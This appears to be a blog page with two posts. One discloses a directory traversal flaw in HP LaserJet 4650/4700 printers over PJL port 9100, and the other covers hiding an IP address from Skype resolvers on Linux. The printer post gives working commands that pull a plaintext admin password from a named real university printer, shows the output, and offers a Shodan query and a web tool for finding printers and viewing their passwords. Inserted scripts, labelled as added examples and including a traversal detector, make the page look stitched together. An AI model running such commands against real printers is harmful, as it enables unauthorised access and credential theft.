Vulnerability in HP Color LaserJet 4650 and 4700 printers

When talking about cyber-security, the first things that come to mind might be personal computers or server racks, or perhaps surveillance cameras given the NSA affair. Printers will probably not be the first thing you think of. However, it is important not to neglect them.

Basics of PJL

PJL is an acronym for Printer Job Language, a protocol developed by Hewlett Packard (HP) to provide a simple communication method between a host, usually a personal computer that has been told to print a document, and the printer. Listening on port 9100 by default, PJL is not restricted to HP printers but is used by other printer models as well. The language provides a set of commands, including file system commands to download and upload files remotely from and to the printing device.
A basic PJL session might look like this:

user@client:~$ telnet 192.168.178.100 9100
Trying 192.168.178.100...
Connected to 192.168.178.100.
Escape character is '^]'.
^[%-12345X@PJL
@PJL INFO ID
@PJL INFO ID
"Brother MFC-7840W:8C5-C17:Ver.L"

@PJL ECHO Hello World
@PJL ECHO Hello World

While the INFO command with the parameter ID requests the printer to reply with its model name and version, ECHO has the printer reply with the subsequent message Hello World. This is not too thrilling yet, until you start playing around with the file system commands prefixed with FS. For example, @PJL FSDIRLIST NAME="0:\" ENTRY=0 COUNT=999 replies with a list of files located on volume 0:\. On most HP printers, this exposes some web server related files to curious eyes. What should not be possible is escaping volume 0:\ by using a double dot. But this is exactly what you can do, and it is called a directory traversal attack. 0:\..\ reveals the parent directory of volume 0:\, and 0:\..\..\ is sufficient on most HP printers to get access to the root directory of the underlying Unix system.

Open file systems

Open printer file systems allow you to upload files directly to the printer's web directory. Visit http://lks-350-375e-038-d.ls.berkeley.edu/hp/device/pjlexploit/PoC.html for a proof of concept. Although there is a protection against file system access, namely a 16-bit PJL password which has to be set via the PJL interface, it has two weaknesses. Firstly, it is too complicated for standard or even advanced users, who would have to know the PJL specification in order to set it up. Secondly, a 16-bit PJL password can be brute-forced within hours.

Plain text passwords

Storing plain text passwords is a sin which you are only allowed to commit as an absolute security beginner. You may not practice this technique when you are an embedded systems developer for a company whose printers are shipped worldwide. However, this is exactly what HP developers have done. Since you have access to a large part of the Unix file system, which only seems to be restricted by native file permissions, you can download the file at 0:\..\..\hpmnt\dsk_cf0a\PermStore\ps_3D_0D.dat using the PJL command FSUPLOAD (PJL commands are named from the perspective of the printer). Guess what this file consists of. If you read the null-terminated ASCII string starting at offset 0x0c, you will notice that it contains the web interface administration password.
Just look at the following short PJL session, which fully exploits this vulnerability. This was a session to 164.67.135.16 at the University of California in Los Angeles, selected as an example because of the highly creative password choice.

^[%-12345X@PJL
@PJL FSUPLOAD NAME="0:\..\..\hpmnt\dsk_cf0a\PermStore\ps_3D_0D.dat" OFFSET=12 SIZE=16
@PJL FSUPLOAD FORMAT:BINARY NAME="0:\..\..\hpmnt\dsk_cf0a\PermStore\ps_3D_0D.dat" OFFSET=12 SIZE=16
password
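From the defender's side, the FSDIRLIST and FSUPLOAD requests shown above are easy to spot in port 9100 traffic. The following Python script, an added example that is not part of the original post, parses the client side of a captured PJL session and flags every file system command whose NAME escapes its volume root with a double dot; the capture it runs over is constructed from the commands discussed in this post.

```python
import re

UEL = "\x1b%-12345X"   # Universal Exit Language sequence that opens a PJL job
FS_COMMANDS = {"FSAPPEND", "FSDELETE", "FSDIRLIST", "FSDOWNLOAD",
               "FSINIT", "FSMKDIR", "FSQUERY", "FSUPLOAD"}
CMD_RE = re.compile(r"@PJL\s+(?P<cmd>[A-Z]+)\s*(?P<args>.*)", re.I)
ARG_RE = re.compile(r'(?P<key>[A-Z]+)\s*=\s*(?:"(?P<q>[^"]*)"|(?P<v>\S+))', re.I)

def parse_command(line):
    """Split one PJL line into (COMMAND, {KEY: value}); None if it is not a command."""
    m = CMD_RE.match(line.replace(UEL, "").strip())
    if not m:
        return None
    args = {a.group("key").upper(): a.group("q") if a.group("q") is not None
            else a.group("v") for a in ARG_RE.finditer(m.group("args"))}
    return m.group("cmd").upper(), args

def escapes_volume(name):
    """True if a PJL path such as '0:\\..\\..\\hpmnt' climbs above its volume root."""
    m = re.match(r"^\d+:[\\/]?(?P<rest>.*)$", name)
    if not m:
        return False
    depth = 0                      # directories below the volume root
    for part in re.split(r"[\\/]+", m.group("rest")):
        if part == "..":
            depth -= 1
            if depth < 0:          # one '..' too many: outside the volume
                return True
        elif part and part != ".":
            depth += 1
    return False

def audit(capture):
    """Return (command, path, verdict) for each file-system command in a capture."""
    findings = []
    for line in capture.splitlines():
        parsed = parse_command(line)
        if parsed and parsed[0] in FS_COMMANDS:
            path = parsed[1].get("NAME", "")
            verdict = "traversal" if escapes_volume(path) else "in-volume"
            findings.append((parsed[0], path, verdict))
    return findings

CAPTURE = (  # constructed client side of a port-9100 session, not a real capture
    UEL + "@PJL\n@PJL INFO ID\n"
    '@PJL FSDIRLIST NAME="0:\\" ENTRY=0 COUNT=999\n'
    '@PJL FSDIRLIST NAME="0:\\..\\..\\" ENTRY=0 COUNT=999\n'
    '@PJL FSUPLOAD NAME="0:\\..\\..\\hpmnt\\dsk_cf0a\\PermStore\\ps_3D_0D.dat" OFFSET=12 SIZE=16\n'
    '@PJL FSUPLOAD NAME="0:\\webServer\\home\\index.htm" OFFSET=0 SIZE=64\n'
)
```

Running audit(CAPTURE) marks the two commands that leave volume 0:\ as "traversal" and the two that stay inside it as "in-volume"; the same check can be applied to a printer's own job log or to a packet capture on port 9100.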

Explore printers yourself

A web-based PJL exploring tool called PJL Explorer has been developed to allow easy graphical access to the printer file system. You can access it at http://blechschmidt.saarland/printers/. PJL Explorer allows you to browse the printer file system and to upload and delete files. To find vulnerable printers, run the following search query using a free Shodan account: port:9100 hp.
The source code of the PJL Explorer is available on GitHub.

Universities of Harvard, Princeton and Cambridge affected


For legal reasons, passwords are not included in this blog post. To view a printer password, use the PJL Explorer linked above.

View the vulnerability report which I have sent to Hewlett Packard. According to HP's reply, two security bulletins have already been published, one in 2010 and another in 2013.

Skype: Hide your IP address from resolvers on Linux

How to hide your IP address from Skype resolvers on Linux

On Windows, Skype offers an option called "Allow direct connections to contacts only" which prevents you from being tracked by so-called Skype resolvers. Unfortunately, Linux does not offer such an option in its graphical user interface. However, there is a detailed description on the Skype community boards on how to enable this feature on Windows 8, which does not seem to have the option integrated into the GUI either. On Linux, you can follow the same instructions, replacing the file name with its Linux equivalent:

  1. Quit Skype
  2. Open a terminal and enter cd /home/{linux username}/.Skype/{skype name}/ (replace {linux username} with your Linux username and {skype name} with your Skype name)
  3. Enter gedit config.xml in order to open the configuration file
  4. Find <Account> in the file using Ctrl+F
  5. Enter <PrivateSkypeMode>1</PrivateSkypeMode> after <Account>
  6. Save the file using Ctrl+S
  7. Restart Skype
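Steps 2 to 6 can be done without a text editor. The Python script below is an added example, not part of the original post: it parses config.xml, inserts <PrivateSkypeMode>1</PrivateSkypeMode> directly after <Account> (or sets an existing element to 1), and keeps a backup of the original file. The <config><Lib><Account> layout of the sample is assumed from the steps above, not verified against every Skype version.

```python
"""Enable Skype's "direct connections to contacts only" mode in a Linux
config.xml by setting <PrivateSkypeMode>1</PrivateSkypeMode> under <Account>."""
import shutil
import sys
import xml.etree.ElementTree as ET

def enable_private_mode(xml_text):
    """Return the config with PrivateSkypeMode set to 1; idempotent."""
    root = ET.fromstring(xml_text)
    account = root.find(".//Account")
    if account is None:
        raise ValueError("no <Account> element: is this really a Skype config.xml?")
    mode = account.find("PrivateSkypeMode")
    if mode is None:               # step 5: add the element right after <Account>
        mode = ET.Element("PrivateSkypeMode")
        account.insert(0, mode)
        mode.tail = account.text   # reuse the indentation already inside <Account>
    mode.text = "1"
    return ET.tostring(root, encoding="unicode")

def private_mode_enabled(xml_text):
    """True when the resolver-protection flag is present and set to 1."""
    mode = ET.fromstring(xml_text).find(".//Account/PrivateSkypeMode")
    return mode is not None and (mode.text or "").strip() == "1"

# Constructed sample of the relevant part of config.xml (assumed layout, not a real file).
SAMPLE_CONFIG = """<?xml version="1.0"?>
<config version="1.0" serial="1">
  <Lib>
    <Account>
      <Alias>alice</Alias>
    </Account>
  </Lib>
</config>
"""

def main(path):
    # Steps 1 and 7 (quit and restart Skype) stay manual; keep a backup before editing.
    shutil.copyfile(path, path + ".bak")
    with open(path, encoding="utf-8") as fh:
        updated = enable_private_mode(fh.read())
    with open(path, "w", encoding="utf-8") as fh:
        fh.write('<?xml version="1.0"?>\n' + updated + "\n")

if __name__ == "__main__":
    main(sys.argv[1])   # e.g. /home/{linux username}/.Skype/{skype name}/config.xml
```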

If you have successfully followed the steps above, Skype resolvers will no longer be able to resolve your IP address. However, contacts in your contact list might still be able to do so using network packet inspectors like Wireshark.

Why you should not purchase Skype resolver blacklisting services

There are several reasons not to purchase the blacklisting offered by several Skype resolving services.
Firstly, Skype resolvers violate your privacy, and in order to protect yourself you are expected to pay their operators. This is morally reprehensible and, in my opinion, close to blackmail.
Secondly, many operators behind these services seem to be cybercriminals who have infected a number of machines in order to run distributed denial of service attacks. It is not uncommon that after you have resolved the IP address of a Skype user, you are asked whether you wish to take the IP address down using some commercial "booter". In most countries this is illegal, and therefore the operators should not be supported.
Most importantly, if you have purchased the blacklisting service, the blacklisting only applies to the Skype resolver from which you have purchased it. If resolving the IP address fails with one Skype resolver, a malicious attacker will just move on to the next one. And even if you purchased blacklisting from every Skype resolver offering it, which may not be all of them, I doubt you could afford it.
Furthermore, there are native methods, like the one described in this blog post, to prevent your IP address from being found by Skype resolvers, for free.